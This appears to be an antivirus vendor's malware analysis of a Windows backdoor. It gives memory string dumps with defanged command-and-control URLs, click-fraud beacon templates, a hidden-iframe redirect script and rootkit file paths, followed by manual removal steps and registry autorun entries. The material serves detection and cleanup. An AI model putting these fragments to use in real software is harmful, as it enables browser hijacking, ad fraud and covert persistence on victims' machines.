RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegQueryInfoKeyA
InternetOpenUrlA
wininet.dll
HttpQueryInfoA
netapi32.dll
kernel32.dll
GetProcessHeap
IPHLPAPI.DLL
GetExtendedTcpTable
SetTcpEntry
%System%\msvbvm60.dll\3
gTTuDPrLqOgsgeYqnKuEKG
.text
`.data
.rsrc
$(9999,048
kYg%D
}.rsrc
KERNEL32.DLL
MSVBVM60.DLL
USER32.DLL
ADVAPI32.DLL
WININET.DLL
DataExecutionPrevention_SupportPolicy
1.01.0001
6hOJ5TI7NaFF0jGgvCqBuzUGD6ROpFip.exe
lnhz9.exe_220_rwx_00401000_0002C000:
SHDocVwCtl.WebBrowser
VB5!6&vb6chs.dll
shdocvw.dll
WebBrowser
shell32.dll
psapi.dll
%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
shlwapi.dll
VBA6.DLL
advapi32.dll
RegOpenKeyA
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegEnumKeyExA
RegDeleteKeyA
RegQueryInfoKeyA
InternetOpenUrlA
wininet.dll
HttpQueryInfoA
netapi32.dll
kernel32.dll
GetProcessHeap
IPHLPAPI.DLL
GetExtendedTcpTable
SetTcpEntry
%System%\msvbvm60.dll\3
gTTuDPrLqOgsgeYqnKuEKG
.text
`.data
.rsrc
$(9999,048
USER32.DLL
KERNEL32.DLL
ADVAPI32.DLL
WININET.DLL
DataExecutionPrevention_SupportPolicy
Explorer.EXE_532_rwx_00FF0000_0000A000:
ver76%szqusn.php?adv=
SafariChromeFirefox
httpo
PSSh\4
.exeu]
%szqusn.php?adv=adv401&code1=%s&code2=%s&id=%d&p=%s&b=%s&c=%d
Chrome
Firefox
Opera
%sypwobybw.exe
%scqksml.php?adv=adv401&id=%d&c=%d
%swqueauo.exe
%smdhpjrpm.php?adv=adv401&id=%d&c=%d
%sdpfom.exe
%swaemxrzu.php?adv=adv401&id=%d&c=%d
%sxadxfbn.exe
%sqqlsqy.php?adv=adv401&id=%d&c=%d
%sgripwn.exe
%spfwicxeqx.php?adv=adv401&id=%d&c=%d
%swutei.exe
%sosmhbjeyw.php?adv=adv401&id=%d&c=%d
%svsjmv.exe
%shhojrlgrzg.php?adv=adv401&id=%d&c=%d
%saxmgx.exe
%sbbweytelg.php?adv=adv401&id=%d&c=%d
%salvwv.exe
%sctkidxfd.php?adv=adv401&id=%d&c=%d
%sgdqt.exe
%sevpxfz.php?adv=adv401&id=%d&c=%d
%srant.exe
%sermgbv.php?adv=adv401&id=%d&c=%d
%sarhcaidx.php?adv=adv401&id=%d&c=%d
hXXp://bascheme.com/orltke/
hXXp://aahacker.com/orltke/
psapi.dll
ddraw.dll
urlmon.dll
shell32.dll
kernel32.dll
user32.dll
wininet.dll
ntdll.dll
\svchost.exe
explorer.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\2gansta.exe
ShellExecuteExA
InternetOpenUrlA
.text
`.rdata
@.data
.reloc
KERNEL32.DLL
ADVAPI32.dll
DDRAW.dll
PSAPI.DLL
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
Explorer.EXE_532_rwx_01E00000_00001000:
.text
`.data
.reloc
svchost.exe_1084_rwx_00A30000_0001A000:
Fmsvcrt.dll
%d %d %d %d %d %d
hXXps://
hXXp://
.com/
Global\C3819288-93FA-4E29-A254-BD9476B53C20
cfg.ini
%s\%s
bckfg.tmp
lsflt7.ver
0;225;224;77;38;56;16;74;75
maxhttpredirects
software\microsoft\windows\currentversion\internet settings
enablehttp1_1
software\microsoft\windows\currentversion\internet settings\zones\3
{AEBA21FA-782A-4A90-978D-B72164C80120}{A8A88C49-5EB2-4990-A1A2-0876022C854F}Opera\Opera\operaprefs.ini
\profile\operaprefs.ini
\prefs.js
network.cookie.cookieBehavior
Mozilla\Firefox\Profiles\
/login/;/tweet/;action=embed-flash;/faq/;/terms/;/contact/;/Forgotpassword/;d.gossipcenter.com/ck.php
hXXp://%s/?xurl=%s&xref=%s
ole32.dll
winmm.dll
atl.dll
oleaut32.dll
clk=%s&bid=%s&aid=%s&sid=%s&rd=%s
n%D,3
Global\6C29A0C8-62C6-415C-9538-B87690BC58D2
lsash.xp
%d|%d|%s|%s
cmd.dll
cmd64.dll
setup.exe
%u|%s
%s=%u|%s
%[^.].%[^(](%[^)])
command|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s|%s
masks|%s
hXXp://NO REF/
.softgeek.
%s#%s
url|%s%s|
%s.dll
kernel32.dll
12345678
0123456789
.text
.rdata
HTTP/1.1 302 Found
Location: %s
HTTP/1.1 200 OK
Content-Length: %d
%sConnection: close
<body><a id=link target=_top></body><script>var url='%s';try{var x=document.getElementById('link');x.href=url;x.click()}catch(e){try{var x=parent?parent:window;x.location.replace(url)}catch(e){}}</script><noscript><META http-equiv="refresh" content="0;URL='%s'"></noscript><iframe src='%s' style='visibility:hidden;'></iframe>
<script>history.back()</script>
Set-Cookie: %s; expires=%s, u-%s-u u:u:u GMT
urlmon.dll
Global\56684A82-D074-4384-AEB9-D1A40041D9FB
chrome
wermgr.exe
-queuereporting_svc
firefox
opera
svchost.exe
ping.exe
127.0.0.1 -t
Global\B10C62E4-234C-4BF6-A1D5-1C0309CED145
Global\D6E9C81C-3831-4873-96BA-7C98D2DEBEF9
Global\a68d7de8-eba6-4a54-90e0-9cb9d93b3ed7
Global\cc51461b-e32a-4883-8e97-e0706dc65415
keywords
Accept-Language: %s
%s hXXp://%s/?xurl=%s&xref=%s
%s %s
1.8|%s|%s|%s|%s|%s|%s
software\classes\http\shell\open\command
<>:"/\|?*
%s-%s
. d SP.%s
google;yahoo;bing.;live.com;msn.com;altavista.com;ask.com;exalead.com;excite.com;dogpile.com;metacrawler.com;webcrawler.com;alltheweb.com;.lycos.;gigablast.com;cuil.com;.aol.;entireweb.com;.search.com;mamma.com;mytalkingbuddy.com;about.com;conduit.com;alexa.com;alltheinternet.com;blinkx.com;aolcdn.com;othersonline.com;everesttech.net;adrevolver.com;tribalfusion.com;adbureau.net;abmr.net;gstatic.com;virtualearth.net;atdmt.com;ivwbox.;powerset.net;yimg.com;2mdn.net;doubleclick.net;iwon.com;scorecardresearch.com;66.235.120.66;66.235.120.67;ytimg.com;infospace.com;edgesuite.net;superpages.com;lygo.com;compete.com;firmserve.com;worthathousandwords.com;yieldmanager.com;wazizu.com;meedea.com;atwola.com;doubleverify.com;tacoda.net;truveo.com;openx.org;adcertising.com;twimg.com;picsearch.com;oneriot.com;.com.com;flickr.com;searchvideo.com;.tqn.com;myspacecdn.com;fimservecdn.com;alexametrics.com
%u|%u
ver=%s&bid=%s&aid=%s&sid=%s&rd=%s&eng=%s&q=%s
hXXp://%s%s
VVV.google.
search.yahoo.com
.altavista.com
/web/results
.ask.com
VVV.exalead.com
/search/web/results
VVV.alltheweb.com
search.lycos.
tab=web
gigablast.com
cuil.com
.aol.
entireweb.com
md=web
VVV.search.com
VVV.mamma.com
mytalkingbuddy.com
searchservice.myspace.com
type=web
search.conduit.com
search.toolbars.alexa.com
alltheinternet.com
/ws/results/web/
?xurl=
http/1.
mozilla
windowsupdate
3506948937
1472967862
\\?\globalroot\device\00000ff8\3f32a78a\lsash.xp
%WinDir%\System32\svchost.exe
\\?\globalroot\device\00000ff8\3f32a78a
\\?\globalroot\device\00000ff8\3f32a78a\cfg.ini
WinExec
SHEnumKeyExA
ExitWindowsEx
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoW
InternetCrackUrlA
`.rdata
@.data
.reloc
b=RzX.aExU
KERNEL32.DLL
ADVAPI32.dll
imagehlp.dll
ntdll.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WebBrowser
127.0.0.1
/c.php?
.google.
%s-%d
eplorer\iexplore.exe" -nohome
spoolsv.exe_1424_rwx_00F00000_00028000:
.text
`.rdata
@.data
.config
.reloc
t%SSS
N. d SP.
%x%x%x%x%x%x
%s|%s|%s|%x|%x|%s|%x|%x|prn15
%[^;];%[^;];%[^;];
kernel32.dll
ntdll.dll
\\?\globalroot\systemroot\system32\kernel32.dll
%s\cfg.ini
%s\config.ini
%s\drv32
cmd.dll
%s\bckfg.tmp
%s\cmd.dll
%s\cmd64.dll
%[^|]|%[^|]|%s
system\currentcontrolset\services\%x
\\?\globalroot%s\cmd.dll
\\?\globalroot%s\cfg.ini
\\?\globalroot%s\bckfg.tmp
%d.%d.%d %d:%d:%d
\\?\globalroot%s\ldr16
\\?\globalroot%s\ldr32
\\?\globalroot%s\ldr64
\\?\globalroot%s\drv64
\\?\globalroot%s\cmd64.dll
cmd64.dll
\\?\globalroot%s\drv32
\\?\globalroot\systemroot\system32\kdcom.dll
\\?\globalroot\systemroot\system32\hal.dll
\\?\globalroot\systemroot\system32\ntoskrnl.exe
\\?\globalroot\systemroot\system32\drivers\etc\hosts
aid=%s
sid=%s
installdate=%s
*=cmd.dll
* (x64)=cmd64.dll
[cmd]
srv=%s
wsrv=%s
psrv=%s
cfg.ini
bckfg.tmp
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><ms_asmv2:trustInfo xmlns:ms_asmv2="urn:schemas-microsoft-com:asm.v2"><ms_asmv2:security><ms_asmv2:requestedPrivileges><ms_asmv2:requestedExecutionLevel level="requireAdministrator"></ms_asmv2:requestedExecutionLevel></ms_asmv2:requestedPrivileges></ms_asmv2:security></ms_asmv2:trustInfo></assembly>
ZwConnectPort
spoolsv.exe
GetWindowsDirectoryW
KERNEL32.dll
RegCreateKeyA
RegCloseKey
ADVAPI32.dll
SHDeleteKeyA
SHLWAPI.dll
imagehlp.dll
PSAPI.DLL
RPCRT4.dll
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
WININET.dll
ShellExecuteW
SHELL32.dll
ole32.dll
WINSPOOL.DRV
.pnLu
`.reloc
kdcom.dll
ntoskrnl.exe
`.pdata
}.Bl$
.PFkX
:F-I}|
.JOf~
Vy;%F
u"%cO
\{x-x-x-x-xx}\registry\machine\%S
\??\physicaldrive%d
services.exe
\??\globalroot\systemroot\system32\tasks\%x
\\?\globalroot%s
%s.manifest
%s\setup%u.exe
r\\?\globalroot%s
spoolsv.exe_1424_rwx_01320000_00046000:
.itext
`.rdata
.rsrc
@.reloc
MSVCRT.dll
comdlg32.dll
SHLWAPI.dll
KERNEL32.dll
GDI32.dll
MapVirtualKeyExW
ActivateKeyboardLayout
USER32.dll
Windows_NT
windows_Nt
P_A.Zt
5.hi^
d&.lYQD
QSSH^)
`%Sea
H}
<y.em
oCrt
l-R%x
!6R%X&
n.WUQ
#9.OO
.eLk#
L:\kKjQxs\ybHesqe\ntKn\piSAssM.pdb
wjwtcP
OrlQdUA7.exe
8.92989<9
1 1$1(1,1014181@1
H:\HGJHGJH\SGKSJGJHSGJHGS\SKJHKJH\
VVV.hkjdh.com/../dsajdh/./sdasda/../asdasd
H:\HGDGYGGJHG\JHDGJHGDJH\DHKJHDJHKJ\DJHKJDHKJDHKJHDKJHDKJH\
C:\win\desktop\temp.txt
c:\win\tray\sample.txt
H:\hgdgyggjhg\jhdgjhgdjh\dhkjhdjhkj\djhkjdhk
Omovypoywudprxbp
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
4IR.exe:612
sc.exe:1304
sc.exe:492
1EuroP.exe:1524
2gansta.exe:1532
net1.exe:584
net1.exe:1604
3IC.exe:1112
net.exe:304
net.exe:2032
rundll32.exe:340
runonce.exe:396
%original file name%.exe:556
Rundll32.exe:132
grpconv.exe:1484
5tbp.exe:1264
- Delete the original Backdoor file.
- Delete or disinfect the following files created/modified by the Backdoor:
%Documents and Settings%\%current user%\Application Data\mdinstall.inf (426 bytes)
%Documents and Settings%\%current user%\Application Data\MouseDriver.bat (103 bytes)
%Documents and Settings%\%current user%\Application Data\0s70t3ayy.bat (142 bytes)
%Documents and Settings%\%current user%\Application Data\lnhz9.exe (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Scv..bat (168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz2.tmp (11920 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\2gansta.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\5tbp.exe (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\3IC.exe (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\1EuroP.exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\4IR.exe (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsj3.tmp\cb.exe (3 bytes)
%WinDir%\msdnih.dll (118 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ez88" = "%Documents and Settings%\%current user%\Application Data\lnhz9.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Ihoragiqinicim" = "rundll32.exe %WinDir%\msdnih.dll,Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GrpConv" = "grpconv -o" (this value runs the Windows Program Group Converter, %System%\grpconv.exe, and is written by Windows during INF-based setup; removing it is harmless, but it does not execute any Backdoor component, so its presence on another machine is not by itself a sign of infection)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.